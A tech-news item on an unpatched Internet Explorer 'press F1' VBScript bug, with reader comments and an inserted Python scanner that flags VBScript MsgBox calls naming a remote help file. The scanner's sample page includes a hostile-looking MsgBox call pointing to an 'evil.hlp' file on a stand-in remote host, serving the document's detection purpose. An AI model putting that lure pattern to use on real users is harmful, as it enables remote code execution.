MS confirms 'F1 to pwn' IE bug
Microsoft has confirmed that an unpatched Internet Explorer vulnerability makes it potentially dangerous to press F1 if you are running earlier versions of Windows. A security bug in the VBScript technology bundled with Internet Explorer means that it might be possible to create a web site that displays a specially crafted …
Exsqueeze me!?
MS have the nerve to take a pop at security researchers?! How about you tell the marketing people to get stuffed and spend more time fixing your shonky OS, eh? Can't even press F1 for help without the OS getting stuffed now? For flip's sake!
@Exsqueeze me!?
"...spend more time fixing your shonky o/s eh"
Like Vista and 7?
Just the 7-year-and-older platforms that could be exploited. The last two versions of Windows (released in the last 4 years) are immune.
simple fix
Switch the F1 with the F2 key on your users' keyboards; with the way our users peck at their keyboards they won't notice anything odd.
This title has been required
>Microsoft gave no indication of when a patch might become available but the next scheduled Patch Tuesday is only six days away, cutting it very fine to develop, much less test, a fix. An April or even May update for IE seems more likely.
Glad to see you take security so seriously, Microsoft. Maybe next time the hackers will wait until your calendar meshes nicer with theirs.
Quaint
Yeah. Patch Tuesday: it's just so quaint! "Hold on there, Mr Hacker! If you could just wait until next Monday before proliferating your exploit..."
Despite the mass of disclaimers in the average EULA, you've got to wonder whether people shouldn't have redress for such defects, especially since the "solution" is to pay the vendor yet more cash for the latest, ultimately defective product.
The exploit itself
The exploit itself affects how winhlp32.exe is compiled. It is a stack buffer overflow which uses IE 6 to 8 and a malicious VBScript on the server side.
Changing the key pressed to initiate the help file will not change how the help file program was compiled, as it is not triggered upon the key pressed, but upon the launch of the HELP file specifically, whilst a msgbox is displayed.
Simple advice: teach users to phone IT support when they see a message that looks suspicious!
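The comment above ties the bug to a VBScript msgbox and a help file that is launched when the user presses F1. As an added example (not code from the article, the commenter or Microsoft), the following Python scanner pulls VBScript blocks out of a page and flags MsgBox calls that pass a fourth argument. That the fourth positional argument of MsgBox is its helpfile is an assumption drawn from the VBScript MsgBox signature (prompt, buttons, title, helpfile, context), not something the page states; the sample page, the host address and the .hlp path in it are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not a real capture). Block 1 is JavaScript and must be
# ignored; block 2 is a harmless VBScript MsgBox; block 3 passes a remote .hlp
# path as MsgBox's fourth (helpfile) argument, the shape the comment describes.
SAMPLE_HTML = r'''<html><body>
<script language="JavaScript">alert("nothing to see here");</script>
<script language="VBScript">
MsgBox "Welcome back", 64, "Greetings"
</script>
<script type="text/vbscript">
Dim t
t = "Press F1 for help"
Call MsgBox(t, 0, "Help", "\\203.0.113.7\share\evil.hlp", 1)
</script>
</body></html>'''

# A helpfile literal that points off-host: UNC path (\\host\share) or URL scheme.
REMOTE_RE = re.compile(r'^"(\\\\|//|[a-z][a-z0-9+.-]*://)', re.IGNORECASE)
MSGBOX_RE = re.compile(r'\bMsgBox\b\s*(.*)', re.IGNORECASE)


class _ScriptCollector(HTMLParser):
    """Collect the bodies of <script> elements declared as VBScript."""

    def __init__(self):
        super().__init__()
        self.blocks = []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = {k.lower(): (v or "").lower() for k, v in attrs}
        if a.get("language", "").startswith("vbs") or "vbscript" in a.get("type", ""):
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.blocks.append("".join(self._buf))
            self._buf = None


def split_args(argstr):
    """Split a VBScript argument list on top-level commas, keeping string
    literals intact (VBScript writes an embedded quote as "")."""
    args, cur, in_str, depth, i = [], [], False, 0, 0
    while i < len(argstr):
        c = argstr[i]
        if in_str:
            cur.append(c)
            if c == '"':
                if i + 1 < len(argstr) and argstr[i + 1] == '"':
                    cur.append('"')
                    i += 1
                else:
                    in_str = False
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c == "'":            # VBScript comment: rest of the line is not code
            break
        elif c in "()":
            depth += 1 if c == "(" else -1
            cur.append(c)
        elif c == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    if cur or args:
        args.append("".join(cur).strip())
    return args


def msgbox_calls(vbscript):
    """Return the argument list of every MsgBox call in a VBScript body."""
    calls = []
    for line in vbscript.splitlines():
        m = MSGBOX_RE.search(line)
        if not m:
            continue
        rest = m.group(1).strip()
        if rest.startswith("(") and rest.endswith(")"):
            rest = rest[1:-1]          # Call MsgBox(...) / x = MsgBox(...) forms
        calls.append(split_args(rest))
    return calls


def scan_html(html):
    """Flag MsgBox calls that supply a helpfile (assumed 4th argument). A literal
    pointing off-host is the case that makes an F1 keypress dangerous."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for block in p.blocks:
        for args in msgbox_calls(block):
            if len(args) >= 4:
                hf = args[3]
                findings.append({
                    "helpfile": hf,
                    "literal": hf.startswith('"'),
                    "remote": bool(REMOTE_RE.match(hf)),
                    "argc": len(args),
                })
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f)
```

This is a heuristic, not a signature: a helpfile passed through a variable shows up with `literal` set to False and has to be read by hand, and script assembled at runtime (string concatenation, Execute) is not seen at all. It is useful for triaging proxy captures or a web filter's sample set, not as the only control.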
Exploit release timeline
===[ DISCLOSURE TIMELINE ]==============================================
01 Feb 2007 The vulnerability was discovered.
26 Feb 2010 Public disclosure.
This exploit must be at least 3 years old!
The researchers are wrong
Whatever your opinion of MS (The Original Steve makes a good point), these researchers are wrong to release an exploit like this without notifying the vendor. MS have a very efficient department when it comes to receiving this kind of information, unlike Apple, who just refuse to even have a process in place (as far as I'm aware). Fair enough, tell MS that you'll give them a week to work on a fix and then you'll release it, but to just release it exposes a lot of people to risk until a fix can be produced. This might not be a small task that can be fixed in a short space of time.
Previous experience?
At times in the past it's taken a fair bit of negative publicity to get Microsoft off their arses and fixes developed. Maybe they've just decided to skip the slow stages of the development cycle. ;-)
Conspiracy theory
That's not a bug, that's a feature in the form of an incentive for users to upgrade from 2000/XP to Vista/7.
But honestly...
How much use does the F1 key really get from the common user, you know, with the actual word "Help" put nicely in the title bar? Joe Shmo can hardly figure out how to copy and paste using the keyboard, let alone venture into the function of the Function keys. Now if it were F5, I'd be livid.
Paris, because if anyone, she needs F1.
Bad publicity = good
Of course MS say the researchers should have gone to them first - it keeps the lid on yet another idiot blunder on Microsoft's part. Sure, it would have come out eventually, but it won't be as big a news story if they'd already sorted it - the worse the press MS get on all their poor software engineering, the better.
Fact is the web exploits instructing people to press F1 are already in place, they were zero-day at the time, and the issue isn't likely to be made much worse by its going public, because now at least some people know not to hit F1. Generally, in the past, public knowledge of a vulnerability has NOT resulted in more websites attempting the same exploit (that is unless Microsoft or whoever fail to update their software promptly) because there are a hell of a lot more zero-day vulns available in the hacker community to work with.
.
@Bruno Girin & The Original Steve - Yes, people should upgrade, but there are still vulnerabilities discovered in Vista and 7 all the time. What about that ridiculous 17-year-old VDM bug that was still present in all 32-bit Windows OSes?
This one, to my knowledge is one of a minority of bugs which only affect OSes prior to Vista.
This is a Microsoft conspiracy
to get you to use a different browser - a few days after their IE option screen for other browsers - coincidence, I don't think so. Wait...what am I saying?